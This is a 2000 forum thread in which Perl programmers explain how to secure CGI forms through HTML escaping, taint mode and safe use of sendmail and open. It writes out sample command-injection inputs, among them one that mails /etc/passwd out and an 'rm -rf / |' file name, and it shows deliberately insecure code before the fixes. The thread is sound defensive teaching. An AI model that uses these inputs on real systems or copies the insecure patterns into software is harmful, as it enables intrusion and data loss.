security holes

merlin posted this at 08:22 — 13th December 2000.

Joined: Oct 1999

i need some very basic information. which kinds of user input must be cleaned of dangerous 'things', and how do i do that?
i have a mailform, a guestbook-script and a postcard-function on one of my sites, and now i'm wondering about the risk i'm taking with them... in which situations can user input be risky?

japhy posted this at 14:01 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

You have several options when accepting text from a form for displaying on an HTML page.

1. (attempt to) remove all HTML tags -- this requires a competent parser (like HTML::Parser, or my YAPE::HTML module), because without a parser, you might get rid of some non-HTML content

2. (attempt to) remove some HTML tags -- this too requires a parser so that certain tags can be left in, while disallowing others, and since HTML elements can be nested, you can't do this with just a regex

3. use an alternate tagging syntax -- like most bulletin boards, which use brackets instead of greater/less than signs (this is closely related to the next one, which is...)

4. escape potentially unsafe characters -- change < to &lt; and > to &gt; and & to &amp;, and you'll be safe

While it would be very cool of you to incorporate a working HTML parser in your guestbook or message board, etc., so that people can use (a select subset of) tags normally, it's probably far easier to use a combination of 3 and 4.

That's what I see practically all forums doing nowadays. My only qualm is that I don't see the forums telling me the precise usage of brackets -- where can I have whitespace? Do I need to escape brackets that aren't to be interpreted as tags? Etc. With HTML parsing, you can be very explicit with instructions: "you are allowed to enter tags normally, but only <a>, <b>, and <i> tags will be recognized".
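A minimal sketch of combining options 3 and 4, under some assumptions: the helper names escape_html and render_post are made up for illustration, and only the bracket tags [b] and [i] are recognized. Everything is escaped first, so any real HTML the user typed becomes harmless text, and only then are the known bracket tags turned into markup.

```perl
use strict;
use warnings;

# Hypothetical helper: escape the three characters named in option 4.
sub escape_html {
    my ($text) = @_;
    my %entity = ('<' => '&lt;', '>' => '&gt;', '&' => '&amp;');
    $text =~ s/([<>&])/$entity{$1}/g;
    return $text;
}

# Hypothetical helper: escape first, then convert a fixed set of
# bracket tags (here only [b] and [i]) into real HTML tags.
sub render_post {
    my ($text) = @_;
    my $html = escape_html($text);
    # \1 requires the closing tag to match the opening one.
    $html =~ s{\[(b|i)\](.*?)\[/\1\]}{<$1>$2</$1>}gis;
    return $html;
}

print render_post('I <3 [b]Perl[/b] & [i]regexes[/i]'), "\n";
# prints: I &lt;3 <b>Perl</b> &amp; <i>regexes</i>
```

A single pass like this does not convert bracket tags nested inside each other; that would need a loop or a real parser.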

Ok, that's my spiel.

merlin posted this at 14:31 — 13th December 2000.

They have: 410 posts

Joined: Oct 1999

Quote: Originally posted by japhy
You have several options when accepting text from a form for displaying on an HTML page.

great!

Quote:
(attempt to) remove all HTML tags -- this requires a competent parser (like HTML::Parser, or my YAPE::HTML module), because without a parser, you might get rid of some non-HTML content

how do i include such a parser and how do i use it? i think i'll consult my perlbooks...

Quote:
escape potentially unsafe characters -- change < to &lt; and > to &gt; and & to &amp;, and you'll be safe

that sounds great! i'd say this is an 'easy' regexp s/

japhy posted this at 14:43 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

Another place to take caution is when you use user input in a system command. Take this VERY SIMPLE (and very insecure) CGI program:

#!/usr/bin/perl

use CGI 'param';
my $function = param('perlfunc');
print "Content-type: text/plain\n\n";
print `perldoc -f $function`;

This code is supposed to get the name of a Perl function from a form (the text element is called 'perlfunc'), and then display the information about that function in the 'perlfunc' document. Who can find the security hole?

What if I enter "; ls -lag" as my "perl function"? Now, my program blindly runs perldoc -f; ls -lag, and the user sees the contents of the current directory. Hmm, and since all Perl CGI programs have to be readable by the 'nobody' user, that means that I can see the NAMES of the other CGI programs.

Then I can just send the program "; cat secret_prog.cgi" and now I've seen the contents of THAT program -- I sure hope you don't use plaintext passwords, or you're ruined.

The solution is to use Perl's taint checking. This is available with the -T switch to perl. Taint checking requires you validate input from outside of your program -- this is usually done with a rigorous regex to ensure the right stuff:

#!/usr/bin/perl -T

use CGI 'param';
my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;
# notice the ()'s around $func -- this is important
# a regex in LIST CONTEXT returns parenthesized sub-patterns
# so $func gets set to the valid portion of the string, if any

print "Content-type: text/plain\n\n";
print `perldoc -f $func`;

That program should run... right? Sorry. Perl thinks the environment is unsafe, and requests that you make it safe, too -- specifically, $ENV{PATH}. This is so that YOU run the 'perldoc' program you THINK you're running.

#!/usr/bin/perl -wT

use CGI 'param';
use strict;

# we should always use -w and 'strict' and -T for CGI programs

$ENV{PATH} = "/bin:/usr/bin:/usr/local/bin";

my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;

print "Content-type: text/plain\n\n";
print `perldoc -f $func`;

That runs fine. And, for even more safety, you might want to change that last line to have the full path to 'perldoc', just in case you're paranoid (which you should be).
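A hedged sketch of the "paranoid" version, going one step further than the full path: it avoids the shell entirely by using the list form of open. The location /usr/bin/perldoc and the helper names valid_perlfunc and perldoc_text are assumptions, not something from the program above. The pattern is the same one as before, but anchored so that the whole input has to be a function name.

```perl
use strict;
use warnings;

# Meant to run under taint mode (perl -T); it also runs without it.
# Clean up the environment before running any external command.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Assumption: perldoc is installed here; adjust for your system.
my $PERLDOC = '/usr/bin/perldoc';

# Return the function name if the WHOLE input looks like one, else undef.
# The captured value is what taint mode treats as validated.
sub valid_perlfunc {
    my ($input) = @_;
    return undef unless defined $input;
    my ($func) = $input =~ /\A(-[a-zA-Z]|[a-zA-Z]+)\z/;
    return $func;
}

# Run perldoc without a shell: the list form of open hands each argument
# straight to the program, so ';' and '|' have no special meaning.
sub perldoc_text {
    my ($func) = @_;
    open(my $fh, '-|', $PERLDOC, '-f', $func)
        or die "can't run $PERLDOC: $!";
    local $/;
    my $text = <$fh>;
    close $fh;
    return $text;
}
```

In a CGI program you would call valid_perlfunc(param('perlfunc')) and only call perldoc_text when the result is defined.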

This is a simplistic example -- the big error I often see is people calling a mail program with the user's email address ON THE COMMAND-LINE. This is just a hole waiting to be exploited:

open MAIL, "| /usr/bin/sendmail $email";

Ouch. I don't think anyone REALLY has an email address of "[email protected]; mail [email protected] < /etc/passwd", but someone SURE could enter that. You're probably best off not trying to validate an email address yourself, but rather, tell sendmail (or whatever client you use) to look in the headers of the message for the To: field:

open MAIL, "| /usr/bin/sendmail -t" or die "can't run sendmail: $!";
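One caveat with the -t approach is that the address now ends up in a header, so it must not contain line breaks, or the user could add header lines of their own. A minimal sketch, assuming hypothetical helpers build_message and send_message and the same /usr/bin/sendmail path as above:

```perl
use strict;
use warnings;

# Hypothetical helper: build a message whose To: header carries the address.
# Header values containing CR or LF are refused, so user input cannot
# start a new header line (for example an extra Bcc:).
sub build_message {
    my ($to, $subject, $body) = @_;
    for my $value ($to, $subject) {
        return undef if !defined $value or $value =~ /[\r\n]/;
    }
    return "To: $to\nSubject: $subject\n\n$body\n";
}

# Assumption: sendmail lives at /usr/bin/sendmail.
sub send_message {
    my ($message) = @_;
    # List form of open: no shell is involved. -t reads the recipients
    # from the headers; -oi stops a line holding only "." from ending
    # the message early.
    open(my $mail, '|-', '/usr/bin/sendmail', '-t', '-oi')
        or die "can't run sendmail: $!";
    print {$mail} $message;
    close $mail or die "sendmail did not exit cleanly (status $?)";
}
```

send_message is only called when build_message returns a defined value; otherwise the form input is rejected.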

That's all for now (again).

Be sure to read the perlsec documentation, which covers tainting in more detail.

japhy posted this at 15:02 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

The simplest mechanism is to set up a translation table:

my %HTML = (
  '<' => 'lt',
  '>' => 'gt',
  '&' => 'amp',
);

Then create a regex based on the keys:

$REx = "[" . join("", keys %HTML) . "]"; # [<>&]

And then use it:

$user_content =~ s/($REx)/&$HTML{$1};/g;

(Notice how I saved the & and ; for the very end, there, instead of putting them in EVERY SINGLE value in the hash.)
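If the escaped text may end up inside an attribute value, the same table can be extended to cover quote characters too. This is a sketch rather than a definitive list: the two extra entries and the helper name escape_attr are my additions for illustration.

```perl
use strict;
use warnings;

my %HTML = (
    '<' => 'lt',
    '>' => 'gt',
    '&' => 'amp',
    '"' => 'quot',   # added: double quote
    "'" => '#39',    # added: single quote, as a numeric reference
);

# Build the character class from the keys; quotemeta keeps every key literal.
my $class = join '', map { quotemeta } keys %HTML;
my $REx   = qr/[$class]/;

sub escape_attr {
    my ($text) = @_;
    $text =~ s/($REx)/&$HTML{$1};/g;
    return $text;
}

my $name = q{" onmouseover="alert(1)};
print '<input name="who" value="', escape_attr($name), qq{">\n};
# prints: <input name="who" value="&quot; onmouseover=&quot;alert(1)">
```

Because the substitution is a single pass, the & in the entities it produces is not escaped a second time.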

There's a module for this already, HTML::Entities, which does even more -- it fixes accented characters and such. It's quite useful and comprehensive.

As far as HTML parsers go, you're not likely to find much about them in your books. I've not used HTML::Parser, but I can tell you how to use my YAPE::HTML module. Once you get the module from http://www.pobox.com/~japhy/YAPE/HTML.pm then you can try this program. This program will spit out the HTML content, and remove ALL TAGS except for <a>, <b>, and <i>.

This can be run as a CGI program OR as a command-line program. This reads a sample HTML file from beneath the __DATA__ marker in the file.

#!/usr/bin/perl -w

use YAPE::HTML;
use strict;

print "Content-type: text/html\n\n" if $ENV{REMOTE_HOST};

my $content;
{ local $/;  $content = <DATA>; }

my $parser = YAPE::HTML->new($content);
my %ok = map +($_, 1), qw( a b i );

while (my $chunk = $parser->next) {
  next if
    $chunk->type eq 'comment' or
    $chunk->type eq 'tag' and not $ok{$chunk->tag} or
    $chunk->type eq 'closetag' and not $ok{$chunk->tag};
  print $chunk->string;
}

__DATA__
This is such a <b>cool</b> site.
<hr>
I hope all this markup gets <i>through</i> ok...
<br><br>
<h2 align="center">Hooray for <a href="http://www.perl.com/">Perl</a>!</h2>
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site

This code, when run, will produce:

This is such a <b>cool</b> site.

I hope all this markup gets <i>through</i> ok...

Hooray for <a href="http://www.perl.com/">Perl</a>!
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site

As you can see, it handles nested elements fine (even if a good element is in a bad element, or vice-versa).

I apologize for the UTTER lack of documentation in the module, but I assure you it will look much better once it is officially released. In the meantime, I offer any and all user support needed. I hope the sample code above is pretty self-explanatory, though.

merlin posted this at 15:27 — 13th December 2000.

They have: 410 posts

Joined: Oct 1999

oh well, i see there's a long way to go... thank you for your help! it'll take some time to learn all the stuff... but another short question for my understanding: does it matter where (cgi-bin-dir or htdocs-dir) the data is stored, or is it always a security risk?

japhy posted this at 15:44 — 13th December 2000.

They have: 161 posts

Joined: Dec 1999

It is far safer to store your data in a directory NOT accessible from the web. That makes it unreachable from the web UNLESS you give people a gateway to the content, like:

open FILE, $some_path_the_user_enters;

That line is unsafe in and of itself. I could enter "/etc/passwd", or "rm -rf / |" (with a two-argument open, a trailing | makes Perl run the text as a command), or something else bad. The point is that you should not trust the end user, and should make sure that you are ok with what they give you. Paranoia helps in this case.
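A minimal sketch of a safer gateway, under stated assumptions: the directory /home/site/data and the helper names safe_path and read_data_file are hypothetical. The user only ever supplies a bare file name, and the program builds the path itself.

```perl
use strict;
use warnings;

# Assumption: data files live in this directory, outside the web root.
my $DATA_DIR = '/home/site/data';

# Hypothetical helper: accept only a bare file name made of safe
# characters, then build the path ourselves. Returns undef otherwise.
sub safe_path {
    my ($name) = @_;
    return undef unless defined $name;
    # No slashes, no spaces, no shell characters, no leading dot.
    my ($clean) = $name =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]*)\z/;
    return undef unless defined $clean;
    return "$DATA_DIR/$clean";
}

sub read_data_file {
    my ($name) = @_;
    my $path = safe_path($name) or die "bad file name\n";
    # Three-argument open: the mode is given separately, so characters
    # such as '|' or '>' in a name are never treated as instructions.
    open(my $fh, '<', $path) or die "can't open $path: $!";
    local $/;
    my $content = <$fh>;
    close $fh;
    return $content;
}
```

With this, "/etc/passwd", "../secret" and "rm -rf / |" are all refused before open is ever reached.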

Mark Hensler posted this at 03:01 — 14th December 2000.

He has: 4,048 posts

Joined: Aug 2000

um...
Aren't you also supposed to escape $ and @ and %?

if you get user input containing:
"blah $ENV{PATH} blah"

won't it print "blah ", then whatever $ENV{PATH} is, then " blah"?
and same for @arrays and %hashes?

Mark Hensler
If there is no answer on Google, then there is no question.

japhy posted this at 03:19 — 14th December 2000.

They have: 161 posts

Joined: Dec 1999

Perl does interpolation only on things in your code. If you run the following Perl program:

#!/usr/bin/perl
$X = 100;
print $ARGV[0];

and run it as perl my_program 'this is $X', you'll get the actual string this is $X, you won't get this is 100.

If that worked, templates would be simple. But Perl would also be terribly insecure.
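To make the difference concrete, here is a small sketch (the helper names echo_input and fill_template are made up for illustration). Interpolating a variable that holds user text inserts the text as it is; a template only gets substitution when the program asks for it explicitly, and then only for names the program chooses to expose.

```perl
use strict;
use warnings;

# Interpolating $input inserts its characters unchanged; a "$X" inside
# the data is not looked at again.
sub echo_input {
    my ($input) = @_;
    return "You wrote: $input";
}

# Explicit template filling: only names present in the hash are replaced,
# everything else is left alone.
sub fill_template {
    my ($text, $vars) = @_;
    $text =~ s/\$(\w+)/exists $vars->{$1} ? $vars->{$1} : "\$$1"/ge;
    return $text;
}

my $input = 'this is $X';   # stands in for text that arrived from a form

print echo_input($input), "\n";                 # You wrote: this is $X
print fill_template($input, { X => 100 }), "\n"; # this is 100
```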